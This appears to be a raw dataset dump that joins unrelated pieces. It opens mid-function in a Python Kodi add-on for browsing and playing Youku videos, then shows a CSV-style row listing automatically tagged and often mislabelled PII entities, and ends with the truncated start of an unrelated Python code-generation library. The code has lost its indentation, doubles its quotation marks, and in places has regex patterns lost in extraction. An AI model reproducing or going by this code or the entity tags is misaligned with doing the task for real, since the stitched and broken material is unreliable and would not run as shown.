', re.DOTALL).search(link)
if match:
listpage = match.group(1)
else:
listpage = ''
match = re.compile('…', re.DOTALL).findall(link) # (pattern lost in extraction)
totalItems = len(match) + 1 + len(plist)
currpage = int(page)
genrelist = getList2(listpage, genre)
if genre == '0':
genrestr = '全部类型'
else:
genrestr = searchDict(genrelist,genre)
li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST2,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST2,order) + '[/COLOR]】(按此选择)')
u = sys.argv[0]+""?mode=12&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
for i in range(0,len(match)):
match1 = re.compile('/id_(.+?).html"').search(match[i])
p_id = match1.group(1)
match1 = re.compile('…(.+?) ').search(match[i]) # (pattern partially lost in extraction)
p_name = match1.group(1)
p_name1 = p_name
li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+""?mode=10&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb)
#li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)
for num in plist:
li = xbmcgui.ListItem(""... 第"" + num + ""页"")
u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+str(num)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def selResolution(streamtypes):
ratelist = []
for i in range(0,len(streamtypes)):
if streamtypes[i] in ('flv', 'flvhd'): ratelist.append([4, '标清', i, 'flv']) # [resolution setting value, quality label, streamtypes index, container]
if streamtypes[i] in ('mp4', 'mp4hd'): ratelist.append([3, '高清', i, 'mp4'])
if streamtypes[i] in ('hd2', 'hd2v2', 'mp4hd2', 'mp4hd2v2'): ratelist.append([2, '超清', i, 'hd2'])
if streamtypes[i] in ('hd3', 'hd3v2', 'mp4hd3', 'mp4hd3v2'): ratelist.append([1, '1080P', i, 'hd3'])
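# ratelist sorts ascending on the setting value, so after the sort below
# ratelist[0] is the best available quality (1080P) and the last entry the lowest (标清)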
ratelist.sort()
if len(ratelist) > 1:
resolution = int(__addon__.getSetting('resolution'))
if resolution == 0: # ask for the video quality every time
options = [x[1] for x in ratelist]
sel = xbmcgui.Dialog().select('清晰度(低网速请选择低清晰度)', options)
if sel == -1:
return None, None, None, None
else:
sel = 0
while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1
else:
sel = 0
return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3]
def youku_ups(id):
res = urllib2.urlopen('https://log.mmstat.com/eg.js')
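# the ETag header value arrives quoted; strip the surrounding quotes to use it as the cna/utid token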
cna = res.headers['etag'][1:-1]
query = urllib.urlencode(dict(
vid = id,
ccode = '0516',
client_ip = '127.0.0.1',
utid = cna,
client_ts = time.time() / 1000,
ckey = 'PI:KEY'
))
url = 'https://ups.youku.com/ups/get.json?%s' % (query)
link = GetHttpData(url, referer='http://v.youku.com/')
json_response = simplejson.loads(link)
api_data = json_response['data']
data_error = api_data.get('error')
if data_error:
api_error_code = data_error.get('code')
api_error_msg = data_error.get('note').encode('utf-8')
dialog = xbmcgui.Dialog()
ok = dialog.ok(__addonname__,'地址解析错误(%d):\n%s' % (api_error_code,api_error_msg))
return {}
else:
return api_data
def change_cdn(url):
# If the cdn_url starts with an IP address, it is probably Youku's old CDN,
# which rejects HTTP requests randomly with status codes > 400.
# Switching it to the aliCDN dispatcher works better and is
# at least a little more recoverable from HTTP 403.
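# For example (illustrative URL), 'http://1.2.3.4/path?x=1' would be rewritten
# to 'http://vali.cp31.ott.cibntv.net/path?x=1'; k.youku.com URLs and URLs
# already on the dispatcher pass through unchanged.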
dispatcher_url = 'vali.cp31.ott.cibntv.net'
if dispatcher_url in url:
return url
elif 'k.youku.com' in url:
return url
else:
url_seg_list = list(urlparse.urlsplit(url))
url_seg_list[1] = dispatcher_url
return urlparse.urlunsplit(url_seg_list)
def PlayVideo(name,id,thumb):
movdat = youku_ups(id)
if not movdat:
return
vid = id
lang_select = int(__addon__.getSetting('lang_select')) # default / ask every time / auto-prefer
if lang_select != 0 and 'dvd' in movdat and 'audiolang' in movdat['dvd']:
langlist = movdat['dvd']['audiolang']
if lang_select == 1:
options = [x['lang'] for x in langlist]
sel = xbmcgui.Dialog().select('选择语言', options)
if sel == -1:
return
vid = langlist[sel]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[sel]['lang'].encode('utf-8'))
else:
lang_prefer = __addon__.getSetting('lang_prefer') # preferred track: 国语 (Mandarin) or 粤语 (Cantonese)
for i in range(0,len(langlist)):
if langlist[i]['lang'].encode('utf-8') == lang_prefer:
vid = langlist[i]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[i]['lang'].encode('utf-8'))
break
if vid != id:
movdat = youku_ups(vid)
if not movdat:
return
streamtypes = [stream['stream_type'].encode('utf-8') for stream in movdat['stream']]
typeid, typename, streamno, resolution = selResolution(streamtypes)
if typeid:
'''
oip = movdat['security']['ip']
ep = movdat['security']['encrypt_string']
sid, token = youkuDecoder().get_sid(ep)
play_method = int(__addon__.getSetting('play_method'))
if play_method != 0: # m3u8方式
query = urllib.urlencode(dict(
vid=vid, ts=int(time.time()), keyframe=1, type=resolution,
ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid,
))
cookie = ['%s=%s' % (x.name, x.value) for x in cj][0]
movurl = 'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s' % (query, cookie)
else: # 默认播放方式
if typeid in ('mp4', 'mp4hd'):
type = 'mp4'
else:
type = 'flv'
urls = []
segs = movdat['stream'][streamno]['segs']
total = len(segs)
for no in range(0, total):
k = segs[no]['key']
if k == -1:
dialog = xbmcgui.Dialog()
ok = dialog.ok(__addonname__,'会员节目,无法播放')
return
fileid = segs[no]['fileid']
ep = youkuDecoder().generate_ep(no, fileid, sid, token)
query = urllib.urlencode(dict(
ctype = 12,
ev = 1,
K = k,
ep = urllib.unquote(ep),
oip = oip,
token = token,
yxon = 1
))
url = 'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format(
sid = sid,
container = type,
fileid = fileid,
query = query
)
link = GetHttpData(url)
json_response = simplejson.loads(link)
urls.append(json_response[0]['server'].encode('utf-8'))
movurl = 'stack://' + ' , '.join(urls)
'''
movurl = movdat['stream'][streamno]['m3u8_url']
#urls = []
#is_preview = False
#for seg in movdat['stream'][streamno]['segs']:
# if seg.get('cdn_url'):
# urls.append(change_cdn(seg['cdn_url'].encode('utf-8')))
# else:
# is_preview = True
#if not is_preview:
# movurl = 'stack://' + ' , '.join(urls)
name = '%s[%s]' % (name, typename)
listitem=xbmcgui.ListItem(name,thumbnailImage=thumb)
listitem.setInfo(type=""Video"",infoLabels={""Title"":name})
xbmc.Player().play(movurl, listitem)
def performChanges(name,id,listpage,genre,area,year,order,days):
genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)
change = False
if id == 'c_95':
str1 = '风格'
str3 = '发行'
elif id == 'c_84' or id == 'c_87':
str1 = '类型'
str3 = '出品'
else:
str1 = '类型'
str3 = '时间'
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
options = [x[1] for x in genrelist]
sel = dialog.select(str1, options)
if sel != -1:
genre = genrelist[sel][0]
change = True
if len(arealist)>0:
options = [x[1] for x in arealist]
sel = dialog.select('地区', options)
if sel != -1:
area = arealist[sel][0]
change = True
if len(yearlist)>0:
options = [x[1] for x in yearlist]
sel = dialog.select(str3, options)
if sel != -1:
year = yearlist[sel][0]
change = True
options = [x[1] for x in DAYS_LIST1]
sel = dialog.select('范围', options)
if sel != -1:
days = DAYS_LIST1[sel][0]
change = True
options = [x[1] for x in ORDER_LIST1]
sel = dialog.select('排序', options)
if sel != -1:
order = ORDER_LIST1[sel][0]
change = True
if change:
progList(name,id,'1',genre,area,year,order,days)
def performChanges2(name,id,listpage,genre,order,days):
genrelist = getList2(listpage, genre)
change = False
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
options = [x[1] for x in genrelist]
sel = dialog.select('类型', options)
if sel != -1:
genre = genrelist[sel][0]
change = True
options = [x[1] for x in DAYS_LIST2]
sel = dialog.select('范围', options)
if sel != -1:
days = DAYS_LIST2[sel][0]
change = True
options = [x[1] for x in ORDER_LIST2]
sel = dialog.select('排序', options)
if sel != -1:
order = ORDER_LIST2[sel][0]
change = True
if change:
progList2(name,id,'1',genre,order,days)
def get_params():
param = {}
paramstring = sys.argv[2]
if len(paramstring) >= 2:
cleanedparams = paramstring.replace('?', '')
if cleanedparams.endswith('/'):
cleanedparams = cleanedparams[:-1]
pairsofparams = cleanedparams.split('&')
for pair in pairsofparams:
splitparams = pair.split('=')
if len(splitparams) == 2:
param[splitparams[0]] = splitparams[1]
return param
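# e.g. sys.argv[2] == '?mode=10&name=Foo&id=123' yields
# {'mode': '10', 'name': 'Foo', 'id': '123'}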
params = get_params()
mode = None
name = ''
id = ''
genre = ''
area = ''
year = ''
order = ''
days = ''
page = '1'
url = None
thumb = None
if "thumb" in params:
thumb = urllib.unquote_plus(params["thumb"])
if "url" in params:
url = urllib.unquote_plus(params["url"])
if "page" in params:
page = urllib.unquote_plus(params["page"])
if "order" in params:
order = urllib.unquote_plus(params["order"])
if "days" in params:
days = urllib.unquote_plus(params["days"])
if "year" in params:
year = urllib.unquote_plus(params["year"])
if "area" in params:
area = urllib.unquote_plus(params["area"])
if "genre" in params:
genre = urllib.unquote_plus(params["genre"])
if "id" in params:
id = urllib.unquote_plus(params["id"])
if "name" in params:
name = urllib.unquote_plus(params["name"])
if "mode" in params:
mode = int(params["mode"])
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
if mode is None:
rootList()
elif mode == 1:
progList(name,id,page,genre,area,year,order,days)
elif mode == 2:
getMovie(name,id,thumb)
elif mode == 3:
seriesList(name,id,thumb)
elif mode == 4:
performChanges(name,id,page,genre,area,year,order,days)
elif mode == 10:
PlayVideo(name,id,thumb)
elif mode == 11:
progList2(name,id,page,genre,order,days)
elif mode == 12:
performChanges2(name,id,page,genre,order,days)
",27353,"[['URL', ""http://list.youku.com/'""], ['URL', ""http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html'""], ['URL', ""http://www.youku.com/show_page/id_'""], ['URL', 'http://v.youku.com/v_show/id_%s.html""'], ['URL', 'http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s""'], ['URL', ""http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://ups.youku.com/ups/get.json?%s'""], ['URL', ""http://v.youku.com/'""], ['URL', ""http://pl.youku.com/playlist/m3u8?%s|Cookie=%s'""], ['URL', ""http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format""], ['LOCATION', 'xbmcgui'], ['LOCATION', 'xbmcaddon'], ['PERSON', 'urllib2'], ['LOCATION', 'os'], ['LOCATION', 'gzip'], ['PERSON', 'Mozilla/5.0'], ['DATE_TIME', ""'5','最受欢迎'""], ['PERSON', 'DAYS_LIST2'], ['DATE_TIME', '65536'], ['NRP', 'sid'], ['PERSON', 'token = e_code.split'], ['NRP', 'sid'], ['PERSON', 'LOGDEBUG'], ['URL', 'code.co'], ['URL', 'urllib2.Re'], ['URL', 'req.ad'], ['URL', 'response.re'], ['PERSON', 'c_95'], ['DATE_TIME', 'year'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['PERSON', 'c_95'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', ""yearstr + '""], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'
.
""""""
.. moduleauthor:: Douglas RAILLARD dummy@email.com
This module mostly provides base classes intended to be subclassed for building
langage specific source code generation libraries.
They implement functionnalities related to operators overloading that can be used in any langage.
Every class representing source code constructs are known as node.
The following helpers functions are provided:
* :func:`listify`: create a list from an iterable or a single element.
* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.).
* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string.
The following classes are provided:
* :class:`Indentation`: manage the indentation level in the code generator.
* :class:`NonIterable`: inheriting that class allows a class which can be considered as iterable to be considered as a non iterable by :func:`listify`.
* :class:`NodeMeta`: metaclass of all class representing some source code constructs.
* :class:`NodeABC`: abstract base class of all class representing some source code constructs.
* :class:`NodeBase`: base class of almost all class representing some source code constructs.
* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition.
* :class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC.
* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name.
* :class:`NodeViewBase`: base class for class representing a view of another node (for example a variable declaration is a view of a variable).
* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required.
* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading.
* :class:`TokenListABC`: abstract base class for token lists. This is a node that can contain a list of any object that can be used as a string, and concatenate them when printed.
* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance).
* :class:`TokenListBase`: base class for a token list.
* :class:`IndentedTokenListBase`: base class for a token list which indents it content when printed.
* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`.
* :class:`BacktraceBase`: base class for special token list that output a simplified backtrace of Python code that was used to build the instance. Useful when trying to debug the code generator.
""""""
import collections
import numbers
import abc
import inspect
import copy
import functools
import os
def listify(iterable_or_single_elem):
""""""Create a list out of:
* an iterable object: the result will be like ``list(iterable_or_single_elem)``
* a object which cannot be iterated over: return a list with only one item (just the object)
* an object which is iterable, but also a subclass of :class:`NonIterable`:
return a list with just the object, as if it was not iterable.
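
A few doctest-style examples (direct consequences of the rules above):

>>> listify(None)
[]
>>> listify((1, 2))
[1, 2]
>>> listify('ab') # strings are deliberately kept whole
['ab']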
""""""
if iterable_or_single_elem is None:
return []
# We exclude iterables such as strings or NonIterable (StmtContainer for example)
# because we want to keep them as one object and not split them
if isinstance(iterable_or_single_elem, collections.Iterable) \
and not isinstance(iterable_or_single_elem, (str, NonIterable)):
return list(iterable_or_single_elem)
else:
return [iterable_or_single_elem]
def format_string(string, style, separator="_"):
""" Format a string according to a convention.

It can be used to write identifier names in a unified format before applying a naming convention.

:param string: the string to be modified. It must be in a format where the word separator is always the same.
:param style: the convention. It can be one of:

* UpperCamelCase
* lowerCamelCase
* lower_underscore_case
* UPPER_UNDERSCORE_CASE

:param separator: the word separator used to split the words apart before applying the convention.
It defaults to '_'.
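
A couple of doctest-style examples (outputs follow from the rules above):

>>> format_string('my_class_name', 'UpperCamelCase')
'MyClassName'
>>> format_string('my_class_name', 'lowerCamelCase')
'myClassName'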
""""""
if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)):
token_list = string
else:
token_list = str(string).split(separator)
# If there is only one token in the list and it is an empty
# string, we don't want to replace it with a separator
if len(token_list) != 1:
for i, token in enumerate(token_list):
if not token:
token_list[i] = separator
if style == ""UpperCamelCase"":
return """".join(token.capitalize() for token in token_list)
if style == ""lowerCamelCase"":
first_word = token_list[0].lower()
remain_list = token_list[1:]
return first_word+"""".join(token.capitalize() for token in remain_list)
if style == ""lower_underscore_case"":
return ""_"".join(token.lower() for token in token_list)
if style == ""UPPER_UNDERSCORE_CASE"":
return ""_"".join(token.upper() for token in token_list)
def strip_starting_blank_lines(snippet):
""""""Strip blank lines at the beginning of a multiline string.""""""
last_new_line_pos = 0
for position, char in enumerate(snippet):
if char=='\n':
last_new_line_pos = position
elif char!='\t' and char!=' ' and char!='\v':
break
# Only keep one new line at the beginning, to avoid multiple blank lines
return snippet[last_new_line_pos:]
class Indentation:
""""""This class manages the indentation in the source code output.
Instances can be printed to give the string to put at the beginning of a new indented line.
>>> idt = Indentation()
>>> idt.indent()
>>> print('*'+str(idt)+'indented Hello World')
* indented Hello World
""""""
# Default indentation style (4 spaces)
indentation_string = ' '
@classmethod
def ensure_idt(cls, idt):
""""""Create a new indentation instance if *idt* is None,
or return *idt* if it is already an :class:`Indentation` instance.
""""""
if idt is None:
idt = cls()
elif isinstance(idt, numbers.Integral):
idt = cls(idt)
elif isinstance(idt, str):
idt = cls(indentator=idt)
return idt
def __init__(self, level=0, indentator=None):
""""""
:param level: the initial indentation level
:type level: int
:param indentator: the string used to display indentation.
It defaults to the class attribute *indentation_string* which is four spaces.
""""""
self.indentation_level = level
# If an indentation string is given, override the classwide default with
# an instance-local string
if indentator is not None:
self.indentation_string = indentator
def indent(self, level=1):
""""""Increase the indentation level by *level* levels.""""""
self.indentation_level += level
def dedent(self, level=1):
""""""Decrease the indentation level by *level* levels.""""""
self.indentation_level -= level
def __str__(self):
""""""Return the string to be used at the beginning of a line to display the indentation.""""""
return self.indentation_string * self.indentation_level
class NonIterable:
"""""" Inheriting from this class will prevent a class to be considered as
:class:`collections.Iterable` by :func:`listify`.
""""""
pass
class NodeMeta(abc.ABCMeta):
""""""Meta class used for every node, i.e. every class representing source code constructs.
Currently, it only does a bit of black magic on :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods:
it creates a wrapper around them that calls *inline_str_filter* if it exists on their return string, to
let the user apply some naming convention at the latest stage.
""""""
def __new__(meta, name, bases, dct):
# Add automatic 'inheritance' for __format_string class attribute
attr_name = '_'+name+'__format_string'
if bases and attr_name not in dct:
try:
dct[attr_name] = bases[0].__dict__['_'+bases[0].__name__+'__format_string']
except KeyError:
pass
# Wrap inline_str function to allow automatic filtering on its output
def make_wrapper(wrapped_fun):
@functools.wraps(wrapped_fun)
def wrapper_fun(self, *args, **kwargs):
result = wrapped_fun(self, *args, **kwargs)
try:
filter_fun = self.inline_str_filter
except AttributeError:
# Just return the string as is, no filter hook is installed
return result
else:
# Call the filter on the resulting string
return filter_fun(result)
return wrapper_fun
for stringify_fun_name in ['inline_str', 'self_inline_str']:
if stringify_fun_name in dct:
wrapped_fun = dct[stringify_fun_name]
dct[stringify_fun_name] = make_wrapper(wrapped_fun)
return super().__new__(meta, name, bases, dct)
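# A minimal sketch of the filter hook described above (hypothetical subclass;
# the name and the filter are illustrative, not part of this module):
#
# class UpperName(NodeBase):
# inline_str_filter = staticmethod(str.upper)
# def inline_str(self, idt=None):
# return 'foo' # rendered as 'FOO' once the metaclass wrapper applies the filter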
class NodeABC(metaclass=NodeMeta):
""""""This class is an Abstract Base Class describing the most basic API evey node should conform to.""""""
__format_string = ''
@abc.abstractmethod
def inline_str(self, idt=None):
""""""This function is called to print the content of the node in an inline context.
This can be for example when the node is printed inside an expression.
This function should not try to print a preceding new line or indentation string.
""""""
pass
@abc.abstractmethod
def freestanding_str(self, idt=None):
""""""This function is called to print the content of the node in a freestanding context.
This can be for example when the node is printed in directly in the source file.
This function should print the preceding new line and indentation if the source code constructs
requires it.
""""""
pass
@abc.abstractmethod
def adopt_node(self, child):
pass
class NodeAttrProxy(NodeABC):
""""""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given
attribute of a given instance.
It creates stubs that allows transparent composition for the most limited subset of the APIs
provided by this library to avoid getting into crazy things.
This class should really be used when this enable to factor lots of code. A design based on
hooks implemented in subclasses called by a base class is preferable in most case where you
would be tempted to use this proxy.
""""""
def __init__(self, obj, attr_name):
self.obj = obj
self.attr_name = attr_name
def inline_str(self, idt=None):
return getattr(self.obj, self.attr_name).inline_str(idt)
def freestanding_str(self, idt=None):
return getattr(self.obj, self.attr_name).freestanding_str(idt)
def adopt_node(self, child):
return getattr(self.obj, self.attr_name).adopt_node(child)
class EnsureNode:
""""""This class is a descriptor that makes sure that the attribute that uses it holds a reference
to an instance of one of the classes given in *node_classinfo*.
When set, this descriptor check if the given object is indeed an instance of *node_classinfo* classes.
If not, it calls *node_factory* to build an object and store its return value. Therefore,
the content of the attribute using this descriptor is always some instance of the classes
contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions
on the type of data hold by the attribute.
.. note:: The *node_classinfo* always contains the class :class:`NodeABC`.
""""""
def __init__(self, storage_attr_name, node_factory, node_classinfo=()):
""""""
:param storage_attr_name: the underlying attribute used to store the object.
:param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute.
:param node_classinfo: this is a tuple that containes classes.
The value stored in the attribute is checked against this tuple using :func:`isinstance` to
determine if the factory should be used. This always contains at least :class:`NodeABC`
""""""
self.storage_attr_name = storage_attr_name
self.node_factory = node_factory
node_classinfo = listify(node_classinfo)+[NodeABC]
if inspect.isclass(self.node_factory):
node_classinfo.append(self.node_factory)
node_classinfo = tuple(node_classinfo)
self.node_classinfo = node_classinfo
def __get__(self, instance, owner):
if instance is not None:
return instance.__dict__[self.storage_attr_name]
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
instance.__dict__[self.storage_attr_name] = value
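# A usage sketch under stated assumptions (Stmt and CommentNode are hypothetical,
# purely for illustration): any non-node assigned to the attribute goes through
# the factory before being stored.
#
# class Stmt(NodeBase):
# comment = EnsureNode('_comment', node_factory=CommentNode)
#
# stmt.comment = 'TODO' # stored as CommentNode('TODO')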
class NodeBase(NodeABC):
""""""This class is the base classes of most nodes.
It provides some default implementations for methods of :class:`NodeABC`.
""""""
@classmethod
def ensure_node(cls, obj, factory=None):
""""""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC`
, and if not, tries to build a node from it using the class this class method is called from or *factory*.
.. note:: You should better use the :class:`EnsureNode` descriptor when possible, instead of making a use of
this class method.
.. warning:: Not every class supports to be called whith only one parameter, so a call to this
class method is note is not guaranteed to succeed.
:param obj: the object to build a node from.
:param factory: an optional factory used to build the node from *obj*. If not provided, the class this
method is called from is called whith *obj* as first and only parameter.
""""""
if isinstance(obj, (cls, NodeABC)):
return obj
else:
if factory is not None:
return factory(obj)
else:
return cls(obj)
def __init__(self, comment=None, side_comment=None, parent=None):
"""""" All of the paramaters should be used as keyword arguments, because they are forwarded from
the children classes and the order at the arrival is not guaranteed.
:param comment: a comment node that will be printed next to the current node when the source code of
the node is generated. Usually, it is a block comment printed before the node
in languages that supports them. This comment is printed by the containers such as
:class:`NodeContainerBase`, so it does not require any support from the class.
:param side_comment: a comment that will be printed just by the current node when the source code of
the node is generated. Usually, it is a one line comment, printed right to the
node. Be aware that this parameter is used by the class in whatever way it wants to,
and there is no guarantee it will be printed at all.
""""""
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.comment = comment
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.side_comment = side_comment
# We don't use try: ... except: to avoid catching exceptions
# occurring inside the adopt_node call
if parent is not None:
if hasattr(parent, 'adopt_node'):
parent.adopt_node(self)
else:
raise NotImplementedError(""The given parent does not support child adoption"")
def freestanding_str(self, idt=None):
""""""See :class:`NodeABC` for the role of this function.
This implementation just calls *inline_str* and prepends a new line and indentation string.
""""""
idt = Indentation.ensure_idt(idt)
snippet = self.inline_str(idt)
# Do not output anything if the string is empty
if snippet:
return '\n'+str(idt)+snippet
else:
return ''
def __str__(self, idt=None):
""""""This implementation tries to print the node by probing the object for some methods:
1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node
2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node
3. *freestanding_str()*: see :class:`NodeABC`
""""""
# We don't use try: ... except: to avoid catching exceptions
# occurring inside the freestanding_str call
# Try to display a declaration
if hasattr(self, 'decl'):
self_decl = self.decl()
if isinstance(self_decl, NodeABC):
return self_decl.freestanding_str(idt)
# Or a definition
elif hasattr(self, 'defi'):
self_defi = self.defi()
if isinstance(self_defi, NodeABC):
return self_defi.freestanding_str(idt)
else:
return self.freestanding_str(idt)
def adopt_node(self, child):
self.append(child)
class DelegatedAttribute:
""""""This class is a descriptor that allows an object to use the value of that attribute of another instance.
For example, the comment attribute of a parent node of a :class:`NodeViewBase` instance is used as the comment
attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the
:class:`NodeViewBase` instance. When that attribute is set, it uses its own object instead of refering to its parent
one.
""""""
def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()):
""""""
:param attr_name: the name of the attribute to manage.
:param delegated_to_attr_name: the name of the attribute holding a reference to the other instance also
holding an *attr_name* attribute.
:param descriptor: a descriptor class, in case the attribute should be managed through a descriptor.
This allows basic descriptor chaining.
:param default_value_list: a list of default values that does not trigger the switch to the local attribute.
For example, if a class set by default a *comment* attribute to None, the attribute
look up should still be made in the other instance. That way, it allows some placeholder
value to be set, without altering the intended behavior.
""""""
self.attr_name = attr_name
self.delegated_to_attr_name = delegated_to_attr_name
self.descriptor = descriptor
self.default_value_list = default_value_list
def __get__(self, instance, owner):
if instance is not None:
# If the attribute has been set on the instance, just get it
if instance.__dict__.get('__'+self.attr_name+'_is_set', False):
if self.descriptor is not None:
return self.descriptor.__get__(instance, owner)
else:
return instance.__dict__[self.attr_name]
# Else it means that the attribute has not been set,
# so we delegate to the parent
else:
parent = getattr(instance, self.delegated_to_attr_name)
return getattr(parent, self.attr_name)
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if self.descriptor is not None:
self.descriptor.__set__(instance, value)
else:
instance.__dict__[self.attr_name] = value
# If the value is one of the default_value_list, do not consider that the attribute was
# set. This allows some code in base classes to set the attribute to None
# by default, and still get the parent's attribute when it is the case
if value not in self.default_value_list:
instance.__dict__['__'+self.attr_name+'_is_set'] = True
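# A sketch of the delegation pattern described above (VarDecl is hypothetical,
# purely for illustration):
#
# class VarDecl(NodeViewBase):
# comment = DelegatedAttribute('comment', 'parent', default_value_list=(None,))
#
# Reading decl.comment falls back to decl.parent.comment until a non-default
# value is assigned on the view itself.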
class NodeViewBase(NodeBase):
""""""This is the base class of the node that are view of other node.
For example, a variable declaration is a view of the variable, as it only displays
informations already contained in the variable object.
View nodes should store the reference of their parent in a *parent* attribute.
""""""
def __init__(self, parent, *args, **kwargs):
self.parent = parent
super().__init__(*args, **kwargs)
def __eq__(self, other):
""""""implementation of the equality test between two views:
it tests to see if they have the same parent and if the two view
are of the exact same type.
""""""
return type(self) is type(other) and self.parent is other.parent
class PhantomNode(NodeBase):
""""""This class is a node that will be printed as an empty string.
This is intended to be used as a placeholder when a :class:`NodeABC` instance is required.
""""""
# PhantomNode must not call Node.__init__ because it causes infinite
# recursion when built from Node.__init__
def __init__(self, *args, **kwargs):
self.parent = self
self.comment = self
self.side_comment = self
def inline_str(self, idt=None):
return ''
freestanding_str = inline_str
# Instance used everywhere, instead of creating billions of identical PhantomNode
PHANTOM_NODE = PhantomNode()
class NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable):
""""""This is the base class of all the nodes that contains a list of other nodes.
It implements all the logic for operators overloading, and printing the nodes that it takes care of.
It also derives from the :class:`collections.MutableSequence` abstract base class, so it behaves
like a list. The only exception is when given to :func:`listify`, it remains as a single object, because
it also derives from :class:`NonIterable`. This is intended to allow the user to add nodes to it later,
and the result should be taken into account by the consumer that used :func:`listify` on it. If it was not the case,
the consumer using :func:`listify` would end up with a list of nodes frozen at the time :func:`listify` is called.
The other important aspect of this class is that it can guarantee the type of the contained nodes, even when
overloaded operators like *+=* are used. See the *node_classinfo* and *node_factory* constructor arguments.
""""""
default_node_classinfo = (NodeABC,)
def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs):
""""""
:param node_list: the list of nodes that the container contains
:param node_classinfo: a tuple of classes used to check the nodes that enters the container.
If a node is not an instance of one of the *node_classinfo* classes, it is
passed to *node_factory*. All of the classes in *node_classinfo* must be
subclasses of :class:`NodeABC`.
:param node_factory: a factory used when an object which is not an instance of one of the classes of
*node_classinfo* tries to enter the container. The return value of this factory
is then allowed inside.
""""""
node_classinfo_tuple = tuple(listify(node_classinfo))
for classinfo in node_classinfo_tuple:
if not issubclass(classinfo, NodeABC):
raise ValueError('node_classinfo must be a subclass of NodeABC')
node_list = listify(node_list)
if node_classinfo is None:
self.node_classinfo = self.default_node_classinfo
